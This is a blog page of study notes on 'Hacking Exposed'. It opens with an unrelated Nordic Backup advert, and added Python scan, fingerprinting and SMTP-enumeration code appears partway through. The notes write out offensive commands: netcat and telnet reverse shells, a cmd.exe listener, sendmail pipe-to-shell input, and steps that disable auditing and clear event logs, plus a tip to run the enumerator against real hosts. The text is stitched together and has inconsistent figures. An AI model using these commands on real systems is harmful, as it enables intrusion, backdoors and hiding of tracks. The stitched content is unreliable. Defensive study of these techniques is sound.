Thursday, December 26, 2019

Secure cloud data backup and more

Founded in 2003 by Morten Westerberg, who holds dual US and Danish citizenship, Nordic Backup was one of the first companies with a vision for cloud backup. For nearly two decades, with thousands of companies and individuals protected, Nordic Backup has never lost a single byte of customer data. We’ve restored thousands of computers and millions of files, getting businesses back up and running and lives back to normal.
More than anything else, we believe that says who we are.

Hacking Exposed Notes

Footprinting – profiling an organization's Internet, intranet, remote access, and extranet presence to determine its security posture and netblocks

Website Pilfering – grabbing source code to analyze offline

Unix – Wget

Win – Teleport Pro

Search Engines – tools for searching multiple engines, IRC, email, etc. at once

Win – FerretPRO($)

Web – DogPile

Registered Networks – internet whois searches

Current Registrars

Unix – Whois, Xwhois

Unix - $ whois "acme." (list possible domains)

Unix - $ whois "HANDLE JS1234" (list POC info)

Unix - $ whois "" (list email info)

Web – US

Web – International

Web – US Military

Web – US Gov

DNS Interrogation – zone transfers (meant to run only between primary and secondary name servers; a server that allows them to anyone hands over the whole zone file)

Unix - $ nslookup

> server x.x.x.x

> set type=any

> ls -d >> /tmp/zone_out

Unix - $ host -l -v -t any

Unix - $ host (resolves Mail Exchange records)

Unix – axfr

Win – Sam Spade

Network Reconnaissance – determine the path to the network (access path diagram)

Unix - $ traceroute -S -p53 x.x.x.x (the -p option sets the starting port, which is incremented by one per probe; -S stops incrementing once an open port is found, so later probes keep passing the firewall)

Requires a patched traceroute

Unix – traceroute option -I uses ICMP echo probes; the default is UDP

Win – tracert (CLI)

Win – VisualRoute, NeoTrace (GUI)

Countermeasure – log incoming traceroutes and send back false data


Scanning – determine which systems are alive and reachable via ping sweeps, port scans, and discovery tools

Ping Sweeps – sending ICMP ECHO (type 8) across address ranges

Unix – fping

Unix – nmap, use the -sP option with a valid net range; -PT<port> sends a TCP ping to the given port when ICMP is blocked

Unix – hping allows you to send fragmented packets (-f)

Unix – icmpenum can use ICMP TIMESTAMP REQUEST and ICMP INFO REQUEST when ECHO is blocked, spoof the source with the -s option, and listen passively for replies with the -p option

Win – Pinger

Win – Ping Sweep

Additional Tools

Unix – Loki2 wraps data in ICMP packets; used to tunnel through firewalls and install backdoors

Port Scanning – connecting to TCP and UDP ports on a target system to see which services are listening and, from the responses, which OS is running

TCP connect scan – full three-way handshake; easily detected by the host or a NIDS

TCP SYN scan – half-open: on a SYN/ACK the scanner answers with RST instead of the final ACK, so no full connection is made; stealthier

TCP Xmas Tree scan – sends segments with FIN, URG and PUSH set; closed ports answer RST, open ports stay silent (RFC 793)

TCP Null scan – sends a segment with no flags set; closed ports answer RST

TCP ACK scan – used to map firewall rulesets and determine whether the filter is stateful

TCP Window scan – analyzes the TCP window size of replies to tell open from closed ports on some stacks, and as an OS hint

TCP RPC scan – Unix; detects RPC ports and the associated program and version

UDP scan – relies on ICMP port unreachable messages for closed ports; less accurate and slower

Unix – Strobe TCP scanner, also grabs banners

Unix – SAINT (SATAN successor) UDP scanner

Unix - netcat multifunction scanner

Unix – nmap, -D option for decoy scans, -I ident scan shows the owner of a service (e.g. root) where identd is running, -b FTP bounce scan

Win – SuperScan

FTP Bounce Scanning - lets the attacker scan (and put/get data) via a third-party FTP server that the target host trusts. Requires the PORT command and a writable directory on the FTP server
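What separates the scan types above is only the flags set in the probe and how the reply is read. The following Python is an added example, not code from the original notes or from nmap: it builds the 20-byte TCP header each scan type sends (with a correct checksum over the IPv4 pseudo-header) and classifies the reply for each type. Addresses and ports are constructed sample values; putting the segment on the wire needs a raw socket and root, which is left out.

```python
"""Raw TCP probe headers for the scan types above, and how each reply is read.

Added example, not code from the original page or from nmap. Only the
segment construction and the reply interpretation are shown; sending
the segment needs a raw socket (root), which is omitted.
Addresses and ports are constructed sample values.
"""
import socket
import struct

FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

# Flags each scan type sets in its probe.
PROBES = {
    "connect": SYN,          # then completes the handshake (logged by the app)
    "syn": SYN,              # half-open: answers SYN/ACK with RST
    "xmas": FIN | PSH | URG,
    "null": 0,
    "ack": ACK,
}


def checksum(data):
    """RFC 1071 one's-complement checksum over 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def _pseudo_header(src_ip, dst_ip, length):
    return struct.pack("!4s4sBBH", socket.inet_aton(src_ip),
                       socket.inet_aton(dst_ip), 0, 6, length)


def build_tcp_header(src_ip, dst_ip, sport, dport, flags, seq=0, window=1024):
    """20-byte TCP header (no options) with a valid checksum."""
    hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, flags,
                      window, 0, 0)
    csum = checksum(_pseudo_header(src_ip, dst_ip, len(hdr)) + hdr)
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:]


def verify_tcp_checksum(src_ip, dst_ip, segment):
    """True if the segment's checksum is valid for this address pair."""
    return checksum(_pseudo_header(src_ip, dst_ip, len(segment)) + segment) == 0


def tcp_flags(segment):
    return struct.unpack("!H", segment[12:14])[0] & 0x01FF


def classify(scan, reply_flags):
    """Port state from the TCP reply; None means nothing came back before
    the timeout. An ICMP unreachable (not modelled here) means 'filtered'."""
    if scan in ("connect", "syn"):
        if reply_flags is None:
            return "filtered"
        if reply_flags & SYN and reply_flags & ACK:
            return "open"
        return "closed" if reply_flags & RST else "filtered"
    if scan in ("xmas", "null"):
        # RFC 793: a closed port answers RST, an open port drops the segment.
        # Stacks that RST everything (Windows) make all ports look closed,
        # which is itself an OS hint.
        if reply_flags is None:
            return "open|filtered"
        return "closed" if reply_flags & RST else "open|filtered"
    if scan == "ack":
        # Says nothing about open/closed, only whether a stateful filter
        # sits in the path: unfiltered ports RST, filtered ones stay silent.
        return "unfiltered" if reply_flags is not None and reply_flags & RST else "filtered"
    raise ValueError("unknown scan type: %s" % scan)


if __name__ == "__main__":
    for name, flags in PROBES.items():
        seg = build_tcp_header("10.0.0.1", "10.0.0.2", 40000, 80, flags)
        print(name, seg.hex(), "flags=0x%02x" % tcp_flags(seg))
```

The checksum is computed over the pseudo-header (source, destination, protocol 6, length) plus the segment, which is why verify_tcp_checksum fails for any other address pair: a spoofed-source probe has to be checksummed for the spoofed address.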

Scan Detection

Unix – Snort, open source NIDS

Unix – scanlogd, host-based logging

Unix – PortSentry, host-based; detects and blocks

Unix – firewall scan detection

Win – Genius 3.2.3, Windows host-based scan detection

OS Determination – using techniques such as banner grabbing, port scanning, and stack fingerprinting to determine the target host's operating system

Stack Fingerprinting – analyzing the target machine's TCP/IP stack responses for OS-specific signatures; each vendor implements the stack slightly differently.

Passive Stack Fingerprinting – no connections are made; packets captured with a sniffer are analyzed for attributes such as TTL, window size, and the DF (don't fragment) bit. The results can be compared to the Siphon fingerprint database
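To make the passive technique concrete, here is a small matcher in Python. It is an added example, not code from the original notes or from Siphon: it parses the TTL, DF bit and window size out of a raw IPv4/TCP frame, rounds the TTL up to its likely initial value, and looks the triple up in a constructed signature table (representative of fingerprint databases of the period, but illustrative only). A build_syn() helper fabricates sample frames so it runs without a sniffer.

```python
"""Passive stack fingerprinting: read TTL, DF and window from sniffed SYNs.

Added example, not code from the original page or from the Siphon tool.
The signature table is a small constructed subset for illustration; the
build_syn() helper fabricates sample frames so the matcher can be run
without a sniffer.
"""
import socket
import struct

# Constructed signatures: (initial TTL, DF set, TCP window) -> OS guess.
# Representative of what fingerprint databases of the period listed;
# treat them as illustrative, not authoritative.
SIGNATURES = {
    (64, True, 5840): "Linux 2.4/2.6",
    (64, False, 32120): "Linux 2.2",
    (128, True, 8192): "Windows NT 4.0",
    (128, True, 16384): "Windows 2000/XP",
    (255, True, 8760): "Solaris 2.x",
    (64, True, 65535): "FreeBSD / Mac OS X",
}


def initial_ttl(observed):
    """Round an observed TTL up to the initial value the sender used
    (each router hop subtracted one)."""
    for base in (32, 64, 128, 255):
        if observed <= base:
            return base
    return 255


def parse_ipv4_tcp(frame):
    """Return (ttl, df, window, tcp_flags) from a raw IPv4+TCP frame."""
    if len(frame) < 20:
        raise ValueError("truncated IP header")
    ver_ihl, _tos, _total, _ident, frag, ttl, proto = struct.unpack("!BBHHHBB", frame[:10])
    if ver_ihl >> 4 != 4:
        raise ValueError("not IPv4")
    if proto != 6:
        raise ValueError("not TCP")
    ihl = (ver_ihl & 0x0F) * 4
    tcp = frame[ihl:ihl + 20]
    if len(tcp) < 20:
        raise ValueError("truncated TCP header")
    _sport, _dport, _seq, _ack, off_flags, window = struct.unpack("!HHIIHH", tcp[:16])
    df = bool(frag & 0x4000)
    return ttl, df, window, off_flags & 0x01FF


def fingerprint(frame):
    """OS guess plus the (ttl, df, window) key that was matched.
    Only an initial SYN carries the stack's defaults unmodified, so
    anything else is reported as a weaker match."""
    ttl, df, window, flags = parse_ipv4_tcp(frame)
    key = (initial_ttl(ttl), df, window)
    guess = SIGNATURES.get(key, "unknown")
    if flags & 0x12 != 0x02:          # not a bare SYN
        guess += " (weak: not an initial SYN)"
    return guess, key


def build_syn(ttl, df, window, src="10.0.0.1", dst="10.0.0.2", flags=0x02):
    """Fabricate a minimal IPv4+TCP frame (checksums left zero) for testing."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0x1234, 0x4000 if df else 0,
                     ttl, 6, 0, socket.inet_aton(src), socket.inet_aton(dst))
    tcp = struct.pack("!HHIIBBHHH", 40000, 80, 1, 0, 5 << 4, flags, window, 0, 0)
    return ip + tcp


if __name__ == "__main__":
    # A SYN that arrived seven hops away from a Linux 2.4 box.
    print(fingerprint(build_syn(ttl=57, df=True, window=5840)))
```

The TTL rounding is what makes the technique passive-friendly: you never see the initial TTL directly, only what is left after the hops in between, so 57 is read as 64 and 119 as 128.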

Discovery Tools

Unix – Cheops Linux GUI for network discovery via ping, traceroute, queso

Unix – Scotty discovery tool, includes SNMP

Enumeration – the process of extracting valid account and shared resource information from a target host


Windows Resource Kits – contain useful Windows utilities

Win2K -


WinNT -

Null Sessions – CIFS/SMB and NetBIOS allow unauthenticated sessions over ports 139 and 445

Win – C:\>net use \\\IPC$ "" /u:"" (setting up a null session)

Win – edit the registry value HKLM\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous

Must be set to 1 on NT (2 on Windows 2000) to restrict null sessions. Read Hobbit's CIFS paper for further info

Domain Enumeration – use NetBIOS over UDP port 137 to list domains and the machines in them

Win – C:\>net view /domain

C:\>net view /domain: (lists machines in the named domain)

NetBIOS Name Tables – grab NetBIOS name tables remotely

Win – C:\>nbtstat -A

Win – C:\>nbtscan

Unix/Win versions found at

Domain Controller Enumeration

Win – C:\>nltest /dclist: (run over a null session; nltest /server: )

C:\>nltest /trusted_domains

Share Enumeration

Win – C:\>net view \\ (rmtshare and srvinfo [-s] from the NTRK are also good)

Win – DumpSec also shows file system permissions and services

Win – Legion 2.1

Win – NAT (NetBIOS Auditing Tool)

Misc Windows Enumeration Tools

Win – Epdump lists RPC service/port mappings

Win – netviewx lists specific server types like domain controllers, RAS and print servers

C:\>netviewx -D -T

Win – Winfo automates null sessions

Win – Nbtdump provides an HTML report

SNMP Enumeration

Win – snmputil – browses the MIB (Management Information Base) tree using default community strings like public and private. The tree is hierarchical, so each time you "walk" further down, more information is revealed. "." is the OID for Microsoft's MIB. (NTRK)

C:\>snmputil walk public .

Win – IP Browser – SolarWinds GUI

More CIFS/SMB Enumeration

Win – DumpSec (formerly DumpACL) – uses a null session to get user, group, share, and policy info

Win – sid2user/user2sid – allow easy conversion of SIDs to usernames and vice versa

C:\>user2sid \\ "domain users" (grabs the machine's or domain's SID)

C:\>sid2user \\ 5 21 8915387 1645822062 18198280005 500 (grabs the admin account's user name; note 500 is always the Administrator RID even if the account has been renamed. Also, the first user-created account always gets RID 1000, incremented by one for each further account)

Mark Russinovich
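The reason the user2sid/sid2user pivot works is the SID layout: every account on a machine or domain shares the same prefix and differs only in the trailing RID. The Python below is an added example, not code from the original notes or from the sid2user tools: it encodes and decodes the binary SID format, splits off the RID, and lists the candidate SIDs you would feed to sid2user. The SID value is a constructed sample; the actual name lookup on the target (LookupAccountSid over the null session) is what sid2user does and is not reproduced here.

```python
"""SID layout behind user2sid/sid2user, and the RID pivot they enable.

Added example, not code from the original page or from the sid2user
tools. The SID below is a constructed sample; the lookup against the
target (LookupAccountSid over a null session) is what sid2user does
and is not reproduced here.
"""
import struct

# Well-known RIDs. 500 and 501 are fixed regardless of renaming; 1000 is
# the first RID handed to a user-created account on NT-family systems.
WELL_KNOWN_RIDS = {
    500: "Administrator",
    501: "Guest",
    502: "krbtgt",
    512: "Domain Admins",
    513: "Domain Users",
    519: "Enterprise Admins",
}


def sid_to_string(blob):
    """Binary SID -> 'S-1-5-21-...'. Layout: revision (1 byte), sub-authority
    count (1), identifier authority (6, big-endian), then count x uint32
    sub-authorities (little-endian)."""
    revision, count = blob[0], blob[1]
    authority = int.from_bytes(blob[2:8], "big")
    subs = struct.unpack("<%dI" % count, blob[8:8 + 4 * count])
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs))


def string_to_sid(text):
    parts = text.split("-")
    if parts[0] != "S" or len(parts) < 3:
        raise ValueError("not a SID string: %r" % text)
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))


def split_rid(sid_text):
    """(domain or machine SID, RID). user2sid on any known account gives
    the left part; sid2user on left part + RID walks the accounts."""
    domain, _, rid = sid_text.rpartition("-")
    return domain, int(rid)


def candidate_sids(domain_sid, first_user_rids=range(1000, 1010)):
    """The SIDs sid2user would be pointed at: built-in RIDs plus the
    first few user-created accounts."""
    rids = list(WELL_KNOWN_RIDS) + list(first_user_rids)
    return ["%s-%d" % (domain_sid, rid) for rid in rids]


def describe(sid_text):
    domain, rid = split_rid(sid_text)
    label = WELL_KNOWN_RIDS.get(rid)
    if label is None and rid >= 1000:
        label = "user-created account #%d" % (rid - 1000 + 1)
    return domain, rid, label or "unknown RID"


if __name__ == "__main__":
    sample = "S-1-5-21-8915387-1645822062-1819828005-500"   # constructed
    print(sid_to_string(string_to_sid(sample)))
    print(describe(sample))
    for cand in candidate_sids(split_rid(sample)[0])[:4]:
        print(cand)
```

Note the mixed endianness: the six-byte identifier authority is big-endian while each sub-authority is a little-endian uint32, which is the detail that trips up hand-written parsers.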

Win – enum – CLI utility for enumeration and password guessing

C:\>enum -U -d -P -L -c

Win – NetE by Sir Dystic of cDc, similar to enum

Win – UserInfo/UserDump use the level 3 call of the NetUserGetInfo API

LDAP Enumeration

Win – ldp.exe – Active Directory Administration Tool – connects to an AD server and lets you browse its contents; runs on either port 389 or 3268 (AD Global Catalog)

Banner Enumeration

Banner grabbing via telnet or netcat on ports like 80, 21, 23 and 25 will often leak system, OS, application, user, or version information. It is also common to "nudge" the system into coughing up more information with commands like GET / HTTP/1.0, HEAD, QUIT, HELP, ECHO, or sometimes just a carriage return.

Registry Enumeration

Regdmp (NTRK) or DumpSec (Somarsoft) can both be used to do this; however, by default Windows 2000 Server usually doesn't allow remote registry access. Review the key HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg\AllowedPaths to see what's allowed


NFS Enumeration

Unix – showmount – lists all NFS (port 2049) exported file systems on a machine

$ showmount -e

NIS Enumeration

Unix – in general, various NIS client tools can be used to guess the NIS domain name of a server and retrieve NIS maps, which contain valuable information (pscan by Pluvius)

User & Group Enumeration

Unix – finger (port 79), rwho, rusers all list who is on the machine at the time. To disable these services, comment them out of inetd.conf and run killall -HUP inetd

Unix – SMTP – VRFY confirms the name of a valid user; EXPN gives out the actual mail addresses behind aliases and mailing lists. Just telnet to port 25 to test.
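The banner grabbing described under Banner Enumeration and the VRFY/EXPN probing above are the same loop: connect, read what the service volunteers (or nudge it if it stays quiet), send a verb, parse the three-digit reply code. The Python below is an added example, not code from the original notes. Because it has to run offline, it includes a constructed stub SMTP server that answers like a permissive sendmail with VRFY and EXPN enabled; the user names, aliases and host name are made up. A 252 reply ("cannot VRFY user") is what a hardened server returns and is treated as a non-answer.

```python
"""Banner grabbing and SMTP VRFY/EXPN user enumeration against a stub server.

Added example, not code from the original page. The SMTP server here is
a constructed stand-in that answers the way a permissive sendmail of the
era did (VRFY/EXPN enabled); run_demo() starts it on a loopback port so
the client code runs offline. Names and addresses are made up.
"""
import socket
import threading

KNOWN_USERS = {"root": "root <root@target.example>", "gk": "gk <gk@target.example>"}
ALIASES = {"staff": ["gk@target.example", "root@target.example"]}
BANNER = b"220 target.example ESMTP Sendmail 8.9.3/8.9.3; Mon, 1 Jan 2001 00:00:00 -0000\r\n"


def fake_smtp_server(listener):
    """Constructed target: serves one connection, then returns."""
    conn, _ = listener.accept()
    with conn, conn.makefile("rb") as rd:
        conn.sendall(BANNER)
        for raw in rd:
            verb, _, arg = raw.decode(errors="replace").strip().partition(" ")
            verb = verb.upper()
            if verb == "VRFY":
                if arg in KNOWN_USERS:
                    conn.sendall(("250 %s\r\n" % KNOWN_USERS[arg]).encode())
                else:
                    conn.sendall(("550 %s... User unknown\r\n" % arg).encode())
            elif verb == "EXPN":
                members = ALIASES.get(arg)
                if members:
                    body = "".join("250-%s\r\n" % m for m in members[:-1])
                    conn.sendall((body + "250 %s\r\n" % members[-1]).encode())
                else:
                    conn.sendall(("550 %s... User unknown\r\n" % arg).encode())
            elif verb == "QUIT":
                conn.sendall(b"221 target.example closing connection\r\n")
                break
            else:
                conn.sendall(b"500 Command unrecognized\r\n")


def read_reply(rd):
    """One SMTP reply, continuation lines ('250-') included -> (code, [text])."""
    lines = []
    while True:
        line = rd.readline().decode(errors="replace").rstrip("\r\n")
        if len(line) < 4:
            return None, lines            # EOF or malformed
        lines.append(line[4:])
        if line[3] != "-":
            return int(line[:3]), lines


def grab_banner(sock, rd, nudge=b"HEAD / HTTP/1.0\r\n\r\n"):
    """Read whatever the service volunteers; if it stays quiet (HTTP does),
    send a nudge and read again."""
    sock.settimeout(2)
    try:
        return rd.readline().decode(errors="replace").strip()
    except socket.timeout:
        sock.sendall(nudge)
        return rd.readline().decode(errors="replace").strip()


def smtp_enumerate(host, port, names, aliases):
    sock = socket.create_connection((host, port), timeout=5)
    with sock, sock.makefile("rb") as rd:
        banner = grab_banner(sock, rd)
        found, expanded = {}, {}
        for name in names:
            sock.sendall(("VRFY %s\r\n" % name).encode())
            code, text = read_reply(rd)
            # 250/251 = valid user; 550 = unknown; 252 = server refuses to
            # say (VRFY disabled), so the technique yields nothing there.
            if code in (250, 251):
                found[name] = text[0]
        for alias in aliases:
            sock.sendall(("EXPN %s\r\n" % alias).encode())
            code, text = read_reply(rd)
            if code == 250:
                expanded[alias] = text
        sock.sendall(b"QUIT\r\n")
        read_reply(rd)
    return banner, found, expanded


def run_demo():
    """Start the stub on a loopback port and enumerate it."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    threading.Thread(target=fake_smtp_server, args=(listener,), daemon=True).start()
    try:
        return smtp_enumerate("127.0.0.1", listener.getsockname()[1],
                              ["root", "gk", "nobody"], ["staff", "ops"])
    finally:
        listener.close()


if __name__ == "__main__":
    print(run_demo())
```

Against a real host, point smtp_enumerate at port 25 with a wordlist of likely names; the banner alone usually gives the MTA version, which is what the buffer overflow and pipe attacks later in these notes key on.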

Unix – tftp – if enabled, may allow you to grab the /etc/passwd file.

RPC Enumeration

Unix – rpcinfo, rpcdump – both list the RPC bindings for all applications running on the box. RPC uses port 111 (portmapper), and 32771 on Solaris.

SNMP Enumeration

Unix – the net-snmp package will usually include both snmpget and snmpwalk

$ snmpget public system.sysName.0 (grabs the host name)

$ snmpwalk public (grabs the entire MIB)

BGP Route Enumeration

Unix – ASN queries – an ASN (Autonomous System Number) is a 16-bit integer obtained from a registry such as ARIN that identifies an organization's routing domain on the Internet. Use to search for this info.

C:\> telnet (public router)

  show ip bgp (the last number in the AS path is the ASN)

  show ip bgp regexp _$ (will give you the public IP space of the company)

Windows NT Hacking – gaining access, escalating privileges and covering tracks on a Windows NT system

Password Guessing

Default Passwords

Null Passwords – tools: NTInfoScan


Password Sniffing – SMB Packet Capture (readsmb) included with L0phtCrack

PPTP – Unix-based sniffer that captures VPN credentials (packetstorm)

Cain & Abel filters out login credentials

Pass the Hash – NT only; LSASS allows hash-only authentication

Buffer Overflows – unexpected input that forces arbitrary code onto the execution stack; papers by DilDog, Barnaby Jack and Aleph One

Privilege Escalation

Hoovering – the process of stealing as much info off the machine as possible with a non-admin account. srvinfo (NTRK) will enumerate shares and regdmp (NTRK) can probe the registry for info. It's also worth scripting a find command in a batch file to look for the string "password". GetAdmin uses DLL injection to add a user to the local Administrators group (crash4)

Sechole, Secholed escalate the privileges of the IUSR_machine_name account on IIS; you must be able to upload to an executable directory on the server

LPC Spoofing

hk (porttool) from Razor exploits the LPC Ports API, which has weak validation checks, and lets a user create a client thread as the SYSTEM user.

Password Cracking – the SAM file may be obtained by booting to an alternate OS, from the repair directory, or by extracting the hashes from the registry with a tool.

Pwdump extracts password hashes from the SAM

L0phtCrack – de facto standard for cracking Windows passwords; no longer free (LC5)

Cain & Abel – poor man's version of LC, free

Wordlists -

Exploiting Trusts

LSA Secrets – the key HKLM\SECURITY\Policy\Secrets holds service account passwords in plaintext, cached passwords of the last 10 users, plaintext FTP and web passwords, RAS usernames and passwords, and domain account information. lsadump2 finds the PID of LSASS and uses DLL injection to read them


Sniffers – WinDump ("w32 tcpdump"), Ethereal, Dsniff for Win32

Keystroke Loggers – if sniffing fails, install a keystroke logger to obtain domain credentials

Remote Control & Backdoors – remote.exe from the NTRK gives remote users a CMD shell. The most popular way to start it on the host is the AT command (Scheduler service).

SC.exe – Service Controller will start the Scheduler service if it's not running: C:\> sc \\ start schedule
C:\> net time \\ (to check the time on the remote system)
C:\> at \\ 10:40P "remote /s cmd secret" (launches the server) C:\> remote /c secret (launches your client)

Netcat – TCP/IP Swiss Army knife
C:\> nc -L -d -e cmd.exe -p 80 (starts a listener on the target host)
C:\> nc 80 (connects the attacker to the target host)

NetBus – similar to Back Orifice; nbsvr.exe must be started on the target first. It's a good idea to run it in stealth mode by modifying the registry, but most virus scanners will detect it running. Default ports are 12345 and 20034
C:\> regini -m \\ regchange.txt (NTRK)

BO2K – Back Orifice 2000, still under active development; works on 2K and XP

Along with these, VNC, NetMeeting, and DameWare are popular GUI-based remote control apps

Port Redirection
Netcat – "shell shoveling": the target connects out to the attacker on one port for input and sends the output of a cmd shell back on another. The attacker must listen on 2 ports
$ nc 80 | cmd.exe | nc 25 (run on target)

Fpipe – popular port redirector, also allows specifying the source port. Does have some session timeout issues with TIME_WAIT and CLOSE_WAIT periods, though. C:\>fpipe -v -l 53 -r 23 (command to run on target)

Root Kits – the first Windows rootkit was from Greg Hoglund. A rootkit is a software suite that substitutes system binaries with Trojans, or uses "function hooking" to redirect calls without altering the executable on disk. The current generation of kernel-level rootkits are very difficult to detect as they are embedded in the OS.

Cover Tracks
Disable Auditing
C:\> auditpol /disable (NTRK)
Clear Event Log
C:\> elsave -s \\ -l "Security" -C

Hiding Files
C:\> attrib +h [directory] (DOS command)
NTFS file streams will hide data as an additional stream of a file. It requires the POSIX utility cp (NTRK)
C:\> cp : (just reverse to unhide)

Windows 2000 Hacking – gaining access, escalating privileges and covering tracks on a Windows 2000 system

Resource Kit Tools

IPSec Filters – built-in feature that does packet filtering very early in the network stack and drops any packets that fail to meet the rules. Limitations: it cannot block IKE, multicast, or broadcast traffic, and can't express port ranges.

NetBIOS/SMB – system information will still be leaked unless you do 1 of 2 things. Disabling File and Print Sharing on your outbound interface will prevent null sessions. Alternatively, set RestrictAnonymous = 2 in either the registry or the Security Policy Manager.

Eavesdropping – any authentication sent using legacy LM hashes can be easily cracked via L0phtCrack. Also, Kerberos authentication is not used if the user specifies an IP address instead of a hostname.

SMBRelay – when connecting to a share/server, Windows automatically tries to log in as the current user if no other authentication information is explicitly supplied, before asking the user for a logon/password. SMBRelay conducts a MITM attack by fooling a user into connecting to your rogue server; after capturing the authentication traffic it is relayed to the actual destination and the response back to the end user.

Denial of Service
New Registry Keys
HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\SynAttackProtect = 2 (times out SYN_RECEIVED faster)
EnableDeadGWDetect = 0 (prevents an attacker from forcing a switch to a different default gateway)
EnablePMTUDiscovery = 0 (stops attackers from lowering the MTU value)
KeepAliveTime = 300,000 (verifies an idle connection is still intact; value in ms)
Services\Netbt\Parameters\NoNameReleaseOnDemand = 1 (ignores NetBIOS name-release requests, the trick nbname below relies on)
Interfaces\PerformRouterDiscovery = 0 (stops router spoofing attacks) (Microsoft KB 142641)

Nbname – this tool puts a host into NetBIOS name conflict, effectively stopping all NetBIOS networking on the host. Must first disable NBT on the attacker machine to use the tool.
C:\>nbname /astat /conflict

Privilege Escalation
PipeUpAdmin – pre-SP2, puts the current user into the Administrators group when run from a cmd prompt

NetDDE – the Network Dynamic Data Exchange service allows applications to share data through "trusted shares". It runs as SYSTEM, so arbitrary code can be attached to the request and voilà, you're admin. Requires Visual C++.
C:\>netddemsg -s cmd.exe

Defeating SYSKEY – pwdump3 can extract hashes from the SAM. pwdump3e from ebiz can do this remotely via SMB. Tools on bootable media can also insert hashes into the SAM, disabling SYSKEY first, similar to NTFSDOS Pro.

Deleting the SAM – simply booting to an alternate OS and deleting the SAM nullifies the Administrator password. DCs are not vulnerable.

EFS – the Encrypting File System lets users encrypt files and folders at the OS level. cipher can be used from the command line. The default recovery agent is the local Administrator account; the recovery key should be stored offline.

EFS Temporary – EFS writes a temp file in plaintext before encrypting a new file; a low-level disk editor like diskprobe.exe (RK) can recover the file even after it's deleted because the disk blocks are not overwritten.

Exploiting Trust
LSA Secrets – lsadump2 still works on W2K. Microsoft doesn't consider it a problem
Multimaster Model – within a Windows 2000 forest, all domains replicate a shared Active Directory and trust each other with two-way transitive trusts, necessitated by the Kerberos implementation. Trusts between forests and to NT domains are still one-way. This allows for consolidation of domains and delegation of permissions via OUs (organizational units).

Back Doors
Trap-Dooring the Path – when executables and DLL files are referenced in the registry without a full path, Windows searches for them in a default order. So by placing your trojaned file of the same name earlier in that search order (e.g. the root of the system drive), the system will launch it instead of the original file.

Remote Control
Terminal Services runs on 3389. TS allows brute-force password guessing even if a lockout policy is set. TS also allows existing sessions to be hijacked if the previous user didn't log out correctly, assuming you have their credentials.

New Stuff
Group Policy – GPOs are a new 2K feature that lets you configure security parameters in one place to be enforced locally or on the domain. (gpedit.msc)

Secedit – the Security Configuration and Analysis tool allows admins to audit the local system's security for compliance issues. It also lets you apply a template automatically and have the changes take effect immediately.

XP Stuff
ICF – Internet Connection Firewall filters all inbound traffic while permitting all outbound traffic.
Software Restriction Policy allows central control over which applications may run, to protect against various forms of malware.
Built-in support for encrypted wireless networking (802.11).
MS Passport – single-login solution for the Internet; works by using a tamper-resistant cookie for accessing all sites that support Passport authentication.
Credential Management, WPA, Remote Desktop, UPnP

UNIX/Linux Hacking – gaining access, escalating privileges and covering tracks on a *NIX system

Vulnerability Mapping is the process of mapping specific security attributes of a system to an associated vulnerability or potential vulnerability.

Nessus is a de facto standard because it's free and works. (Unix and Windows ports)

Remote Attacks – exploit a listening service (telnet, ftp, ssh, etc.)
Route Through a Unix System – circumvent a Unix firewall by source-routing your packets through it. Works only if the system has IP forwarding enabled.
User-Initiated Remote Execution – attacks requiring user interaction, such as browsing malicious web sites or opening email attachments.
Promiscuous Mode Attacks – crafted packets can exploit your sniffer application

Brute Force – Brutus, common tool
John the Ripper – standard Unix cracker

Data Driven Attacks are executed by sending data to an active service that causes unintended or undesirable results. A buffer overflow condition occurs when a user or process attempts to place more data into a buffer than was originally allocated. This behavior is associated with specific C functions like strcpy, strcat, sprintf, etc. A buffer overflow would normally cause a segmentation violation. In the attack, special assembly code known as the egg is sent (in the classic sendmail example, to the VRFY command) as part of the string used to overflow the buffer. When the buffer is overrun, the attacker overwrites the return address of the offending function to point at their own code's memory address, which usually spawns a shell.

Unix memory dump analysis – good luck
Aleph One's paper, Phrack 49
Hellkit for writing buffer overflows
Disable stack execution (Solaris) in /etc/system: set noexec_user_stack=1 and set noexec_user_stack_log=1

Heap Overflows are based on overrunning memory that has been dynamically allocated by an application. This differs from stack-based overflows, which depend on overflowing a fixed-length buffer on the stack.

Format String Vulnerabilities arise from subtle programming errors in the formatted output family of functions, which includes printf() and sprintf(). An attacker can take advantage of them by passing carefully crafted text containing formatting directives, which can cause the target to execute arbitrary code. For example, by using printf(buf) instead of printf("%s", buf), the program treats the user-supplied argument as the format string; directives like %x read the stack and %n writes to memory, which is how control of execution is gained.

Input Validation Attacks occur when a program fails to recognize syntactically incorrect input, a module accepts extraneous input, a module fails to handle missing input fields, or a field-value correlation error occurs. Often used to exploit CGI scripts or other web applications.

Shell Access – xterm, if enabled, is the easiest way to get local GUI access on a machine remotely, but may need to be combined with an exploit. $ /usr/X11R6/bin/xterm -ut :0.0

Reverse Telnet/Netcat will both provide attackers with a back channel into the system that originates from the target host. Both require a listener to be running on the attacker's side.
$ /bin/telnet 80 | /bin/sh | /bin/telnet 25
$ nc -e /bin/sh 80

TFTP/Anonymous FTP both allow an attacker to gain access to your machine, and if a writable/executable directory is available the system is toast. The services themselves may also be vulnerable to exploits.

Sendmail, the standard Unix Mail Transfer Agent, has been full of vulnerabilities dating back to 1988. Common attacks aside from buffer overflows, input validation, and SMTP enumeration include:

Pipe Vulnerability, which allows a user to escape to a shell after the data portion
mail from:
rcpt to: bounce
data
.
mail from: bin
rcpt to: | sed '1,/^$/d' | sh
data

Forward Vulnerability
cat > .forward (create a .forward file, then FTP it into the user's home directory)
